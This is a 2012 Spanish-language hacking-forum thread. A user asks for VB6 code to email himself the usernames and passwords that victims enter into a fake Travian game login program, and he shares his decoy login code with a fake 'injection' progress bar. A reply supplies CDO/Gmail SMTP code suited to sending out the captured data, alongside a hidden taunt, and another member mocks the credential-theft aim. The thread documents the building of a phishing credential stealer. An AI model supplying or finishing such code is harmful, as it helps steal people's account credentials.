elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Enviar mails con la información.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Enviar mails con la información.  (Leído 2,040 veces)
endzel

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Enviar mails con la información.
« en: 31 Octubre 2012, 22:01 pm »

Hola muy buenos días gente de elhacker, soy algo nuevo o mejor dicho bastante nuevo en este foro, y tengo una duda con un mini ejecutable que estoy creando en vb 6 lo que pasa es que ya hace tiempo que no utilizaba este programa y se me han olvidado bastantes codigos, como el que les vengo a pedir ahora, estoy haciendo un ejecutable y necesito que la informacion puesta dentro de los campos creados se me envie a un mail, osea que el sujeto al poner su contraseña y usuario y al darle al boton de ok, se me envie un mail a mi mail con los datos puestos en este, si me pudieran ayudar le agradeceria demasiado, estuve buscando en el foro pero no encontre lo que necesitaba o busque mal, bueno de todas formas el post ya esta creado espero que me puedan ayudar, desde ya muchas gracias.


En línea

MauroMasciar


Desconectado Desconectado

Mensajes: 567



Ver Perfil
Re: Enviar mails con la información.
« Respuesta #1 en: 31 Octubre 2012, 22:11 pm »

¿Y que es lo que tenes hecho hasta ahora?


En línea

Tutto ha oceani da attraversare mentre hanno il coraggio di farlo Avventato? Ma sanno sogni di limiti

Twitter: @MauroMasciar
endzel

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Enviar mails con la información.
« Respuesta #2 en: 31 Octubre 2012, 22:28 pm »

¿Y que es lo que tenes hecho hasta ahora?


Bueno, estaba haciendo un fake para travian y lo que tengo hecho hasta ahora es.

Código:
Private Sub Command1_Click()
If Text1.Text = "user" And Text2.Text = "pass" Then
ProgressBar1.Max = 100
ProgressBar1.Min = 0
ProgressBar1.Value = i
For i = 0 To ProgressBar1.Max
ProgressBar1.Value = i
Next
End If
If ProgressBar1.Value = 100 Then
Form2.Show
MsgBox ("¡Login succesful!")
Form1.Hide
End If
End Sub

Esto seria como el login para hacerlo parecer normal.

Código:
Private Sub Command1_Click()
Timer1.Enabled = True
End Sub

Private Sub Timer1_Timer()
Timer1.Interval = Rnd * 300 + 10
ProgressBar1.Value = ProgressBar1.Value + 2
Label9.Caption = ProgressBar1.Value & "%"
If Label9.Caption = 100 & "%" Then
MsgBox "¡Injection completed!", vbInformation + vbDefaultButton1, "Travian 4"
End If
End Sub

Y esto seria el form2 que contiene un poco(casi nada) del codigo del ejecutable.



Aproposito, como puedo hacer spoilers?
« Última modificación: 31 Octubre 2012, 22:31 pm por endzel » En línea

79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
Re: Enviar mails con la información.
« Respuesta #3 en: 2 Noviembre 2012, 19:20 pm »

HOLA!!!

Código
  1. ub SendEmail()
  2.  
  3. Set iMsg = CreateObject("CDO.Message")
  4. Set iConf = CreateObject("CDO.Configuration")
  5. Set Flds = iConf.Fields
  6.  
  7. schema = "http://schemas.microsoft.com/cdo/configuration/"
  8. Flds.Item(schema & "sendusing") = 2
  9. Flds.Item(schema & "smtpserver") = "smtp.gmail.com"
  10. Flds.Item(schema & "smtpserverport") = 465
  11. Flds.Item(schema & "smtpauthenticate") = 1
  12. Flds.Item(schema & "sendusername") =  Username@gmail.com
  13. Flds.Item(schema & "sendpassword") = password
  14. Flds.Item(schema & "smtpusessl") = 1
  15. Flds.Update
  16.  
  17. With iMsg
  18. .To = To
  19. .From = username@gmail.com
  20. .Subject = "Mail from gmail"
  21. .HTMLBody = "Test message using CDO in vb6 from Gmail smtp"
  22. Set .Configuration = iConf
  23. .Send
  24. End With
  25.  
  26. Set iMsg = Nothing
  27. Set iConf = Nothing
  28. Set Flds = Nothing
  29.  
  30. End Sub

P.D: Endzel: Te dejo el siguiente codigo, pero como es medio peligroso dejarlo asi nomas vas a tener que seleccionar el texto de abajo para leerlo .


LLL          AAAA     MMMM   MMMM  MMMM   MMMM  EEEEEE  RRRRR 
LLL         AA   AA   MM MM MM MM  MM MM MM MM  EE         RR    RR 
LLL        AA     AA  MM  MMM   MM  MM  MMM   MM   EEEE     RRRRR 
LLL        AAAAAAA MM    M      MM  MM   M      MM   EE         RR   RR 
LLLLLLL  AA      AA MM            MM  MM            MM  EEEEEE  RR     RR




GRACIAS POR LEER!!!
En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
MauroMasciar


Desconectado Desconectado

Mensajes: 567



Ver Perfil
Re: Enviar mails con la información.
« Respuesta #4 en: 2 Noviembre 2012, 20:11 pm »

P.D: Endzel: Te dejo el siguiente codigo, pero como es medio peligroso dejarlo asi nomas vas a tener que seleccionar el texto de abajo para leerlo .


LLL          AAAA     MMMM   MMMM  MMMM   MMMM  EEEEEE  RRRRR  
LLL         AA   AA   MM MM MM MM  MM MM MM MM  EE         RR    RR  
LLL        AA     AA  MM  MMM   MM  MM  MMM   MM   EEEE     RRRRR  
LLL        AAAAAAA MM    M      MM  MM   M      MM   EE         RR   RR  
LLLLLLL  AA      AA MM            MM  MM            MM  EEEEEE  RR     RR



Hiciste bien en esconderlo de esa manera chico :xD
@endzel se nota que tenes que seguir investigando, dejándolo como lo dejo @79137913 uno podría avivarse, descompilar el .exe y ver tu usuario y contraseña del GMail o Mail que le pongas.

Aparte, robar cuentas de Travian? Pfff
¿Y para que las necesitas?
« Última modificación: 2 Noviembre 2012, 20:15 pm por MauroMasciar » En línea

Tutto ha oceani da attraversare mentre hanno il coraggio di farlo Avventato? Ma sanno sogni di limiti

Twitter: @MauroMasciar
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Tutorial enviar e-mails anonimos « 1 2 ... 13 14 »
Tutoriales - Documentación
Songoku 131 175,070 Último mensaje 8 Octubre 2005, 12:44 pm
por Songoku
Enviar mails a inbox « 1 2 »
PHP
camdark 16 7,210 Último mensaje 23 Enero 2007, 12:34 pm
por chicuela66
Enviar mails
PHP
Hellcloud 8 5,065 Último mensaje 15 Abril 2011, 10:11 am
por dimitrix
“Prohibido enviar e-mails”
Noticias
wolfbcn 4 2,591 Último mensaje 20 Diciembre 2011, 15:13 pm
por Ak_Boga
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines